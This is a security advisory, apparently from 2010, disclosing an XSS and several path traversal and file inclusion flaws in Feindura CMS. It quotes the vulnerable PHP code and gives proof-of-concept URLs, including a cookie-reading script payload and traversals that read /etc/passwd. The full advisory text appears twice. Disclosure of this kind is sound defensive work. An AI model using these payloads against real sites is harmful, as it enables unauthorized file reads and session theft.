JAHx104 - Multiple vulnerabilities in Feindura CMS
--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------
Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: http://feindura.org ]
--- Vulnerability description ---
Feindura CMS sufferes from multiple vulnerabilities.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc
--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned direclty from user input and later used in output.
library/sites/editor.php:24 $category = $_GET['category'];
library/sites/editor.php:186 echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group
'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd
--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72 case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73 if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74 $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75 }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245 public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246 if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247 header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248 header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249 header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250 header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251 header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252 $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253 $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254 header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255 readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256 } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257 $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258 }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259 }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd
--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47 $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00
--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.
--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------
Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: http://feindura.org ]
--- Vulnerability description ---
Feindura CMS sufferes from multiple vulnerabilities.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc
--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned direclty from user input and later used in output.
library/sites/editor.php:24 $category = $_GET['category'];
library/sites/editor.php:186 echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group
'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd
--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72 case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73 if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74 $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75 }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245 public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246 if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247 header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248 header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249 header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250 header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251 header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252 $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253 $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254 header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255 readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256 } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257 $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258 }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259 }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd
--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47 $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00
--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.
--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email
